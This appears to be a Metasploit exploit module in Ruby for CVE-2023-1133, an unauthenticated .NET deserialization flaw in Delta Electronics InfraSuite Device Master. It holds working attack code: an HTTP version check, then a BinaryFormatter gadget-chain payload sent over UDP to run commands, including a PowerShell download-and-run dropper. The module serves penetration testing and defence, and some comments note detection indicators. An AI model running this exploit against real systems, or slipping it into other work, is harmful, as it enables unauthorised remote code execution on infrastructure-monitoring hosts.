GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # CmdStager supplies execute_cmdstager, which calls back into #execute_command.
  include Msf::Exploit::CmdStager
  # HttpClient is used only by #check (fingerprinting over INFRASUITE_PORT).
  include Msf::Exploit::Remote::HttpClient
  # Udp supplies connect_udp / udp_sock / disconnect_udp used by #exploit and #cleanup.
  include Msf::Exploit::Remote::Udp
  # AutoCheck runs #check before #exploit, so an unaffected host is not sent the payload.
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and datastore options.
  #
  # Two ports are involved: RPORT (default 10100) is the UDP port the serialized
  # payload is written to in #execute_command, while INFRASUITE_PORT (default 80)
  # is the HTTP port #check uses to fingerprint the web UI. The declared Notes
  # (ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS) are the detection surface
  # an operator or defender should expect from a successful run.
  #
  # @param info [Hash] base module info merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Delta Electronics InfraSuite Device Master Deserialization',
        'Description' => %q{
          Delta Electronics InfraSuite Device Master versions below v1.0.5 have an
          unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'
          method of the 'Device-Gateway-Status' process.

          The 'ParseUDPPacket()' method reads user-controlled packet data and eventually
          calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,
          leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.
        },
        'Author' => [
          'Anonymous', # Vulnerability discovery
          'Shelby Pace' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2023-1133'],
          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/'],
          ['URL', 'https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133']
        ],
        'Platform' => 'win',
        'Privileged' => false,
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Windows EXE Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :windows_dropper,
              'CmdStagerFlavor' => :psh_invokewebrequest
            }
          ],
          [
            'Windows CMD',
            {
              'Arch' => [ARCH_CMD],
              'Type' => :windows_cmd
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2023-05-17',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options([
      # UDP port the payload datagram is sent to (see #exploit / #execute_command).
      Opt::RPORT(10100),
      # HTTP port of the web UI, used only for fingerprinting in #check.
      OptInt.new('INFRASUITE_PORT', [ true, 'The port on which the InfraSuite Manager is listening', 80 ]),
      OptString.new('TARGETURI', [ true, 'The base path to the InfraSuite Manager', '/' ])
    ])
  end

  # Passive version check over HTTP; nothing is sent to the UDP service here.
  #
  # Step 1 fetches login.html and looks for the 'InfraSuite Manager Login' marker.
  # Step 2 fetches js/webcfg.js and extracts the version from a `version:'x.y.z'`
  # literal. Versions below 1.0.5 are reported as Appears; 1.0.5 and later as Safe.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when no HTTP response, Safe when the
  #   login marker is absent or the version is >= 1.0.5, Detected when the product
  #   is recognised but the version cannot be read, Appears otherwise
  def check
    print_status('Requesting the login page to determine if target is InfraSuite Device Master...')
    res = send_request_cgi(
      'method' => 'GET',
      'rport' => datastore['INFRASUITE_PORT'],
      'uri' => normalize_uri(target_uri.path, 'login.html')
    )

    # No response at all (timeout / connection failure) is not evidence either way.
    return CheckCode::Unknown unless res

    unless res.body.include?('InfraSuite Manager Login')
      return CheckCode::Safe('Target does not appear to be InfraSuite Device Master.')
    end

    print_status('Target is InfraSuite Device Master. Now attempting to determine version.')
    res = send_request_cgi(
      'method' => 'GET',
      'rport' => datastore['INFRASUITE_PORT'],
      'uri' => normalize_uri(target_uri.path, 'js/webcfg.js')
    )

    # Safe navigation: this second request may fail independently of the first.
    unless res&.body&.include?('var devicemasterCfg')
      return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.')
    end

    # One capture group: digits separated by dots with an optional trailing letter.
    version = res.body.match(/version:'(\d+(?:\.\d+)+[a-zA-Z]?)'/)
    # MatchData#length counts the whole match plus captures, so > 1 means the group matched.
    unless version && version.length > 1
      return CheckCode::Detected('Failed to find version string')
    end

    version = version[1]
    vprint_status("Found version '#{version}' of InfraSuite Device Master")
    r_vers = Rex::Version.new(version)

    # 1.0.5 is the first version the description calls unaffected.
    return CheckCode::Appears if r_vers < Rex::Version.new('1.0.5')

    CheckCode::Safe
  end

  # Opens the UDP socket to RPORT and dispatches on the selected target type.
  # The socket is left open here and closed in #cleanup, which the framework
  # invokes after #exploit returns or raises.
  def exploit
    connect_udp
    case target['Type']
    when :windows_dropper
      # CmdStager calls #execute_command one or more times with staged commands.
      execute_cmdstager
    when :windows_cmd
      execute_command(payload.encoded)
    end
  end

  # Serializes +cmd+ into a .NET BinaryFormatter stream and writes it as a single
  # UDP datagram framed for the vulnerable parser: one 0x01 byte, a 16-bit
  # big-endian length, then the serialized bytes.
  #
  # Defender note: the datagram itself is the on-the-wire indicator — a UDP packet
  # to the Device-Gateway-Status port starting with 0x01 followed by a
  # BinaryFormatter stream.
  #
  # NOTE(review): pack('n') silently truncates lengths above 0xFFFF and
  # String#length is in characters rather than bytes — this relies on generate()
  # returning a binary (ASCII-8BIT) string under that size; confirm.
  #
  # @param cmd [String] command to embed in the gadget chain
  # @param _opts [Hash] unused; present to satisfy the CmdStager callback signature
  # @return [void]
  def execute_command(cmd, _opts = {})
    serialized = ::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :ClaimsPrincipal,
      formatter: :BinaryFormatter
    )

    pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}"
    udp_sock.put(pkt)
  end

  # Closes the UDP socket opened in #exploit.
  def cleanup
    disconnect_udp
  end
end